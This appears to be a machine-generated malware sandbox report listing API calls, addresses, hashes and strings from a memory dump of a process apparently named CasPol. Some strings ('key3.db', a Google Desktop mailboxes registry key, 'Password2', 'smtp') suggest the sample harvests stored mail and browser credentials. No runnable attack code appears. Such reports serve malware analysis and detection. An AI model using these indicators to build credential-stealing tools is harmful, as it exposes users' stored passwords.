                                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                                  • String ID: $no query solution
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041DBAE
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041DBDB
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041DC47
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                                                                                  • API String ID: 231171946-3708268960
                                                                                                                                                                                  • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                  • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID: winWrite1$winWrite2
                                                                                                                                                                                  • API String ID: 438689982-3457389245
                                                                                                                                                                                  • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                  • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                  • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                  • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: winRead
                                                                                                                                                                                  • API String ID: 1297977491-2759563040
                                                                                                                                                                                  • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                  • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                  • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                  • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: gj
                                                                                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                                                                                  • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                  • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                  • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                  • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                    • Part of subcall function 00411004: memcpy.MSVCRT(?,<,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                  • API String ID: 3337535707-2769808009
                                                                                                                                                                                  • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                  • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                  • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4247780290-0
                                                                                                                                                                                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                    • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                    • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                    • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                    • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                  • SetCursor.USER32 ref: 0040B9F9
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040BA0B
                                                                                                                                                                                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2374668499-0
                                                                                                                                                                                  • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                  • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                                  • <%s>, xrefs: 0040ADA2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                  • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                  • API String ID: 3699762281-1998499579
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                  • free.MSVCRT ref: 00409B00
                                                                                                                                                                                    • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@$free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2241099983-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                    • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                    • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                  • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2775283111-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                    • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                    • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                    • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                  • String ID: $
                                                                                                                                                                                  • API String ID: 2498372239-3993045852
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                  • API String ID: 885266447-2471937615
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406B11
                                                                                                                                                                                    • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                    • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                                                    • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                  • String ID: Ul@$key3.db
                                                                                                                                                                                  • API String ID: 1968906679-1563549157
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                  • String ID: smtp
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • memset.MSVCRT ref: 00408258
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close$EnumOpenmemset
                                                                                                                                                                                  • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040C314
                                                                                                                                                                                    • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FocusMessagePostmemset
                                                                                                                                                                                  • String ID: S_@$l
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004092C0
                                                                                                                                                                                  • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                  • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy
                                                                                                                                                                                  • String ID: C^@$X$ini
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                  • String ID: MS Sans Serif
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClassName_strcmpimemset
                                                                                                                                                                                  • String ID: edit
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen$_mbscat
                                                                                                                                                                                  • String ID: 3CD
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscat$_mbscpy
                                                                                                                                                                                  • String ID: Password2
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                  • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                  APIs
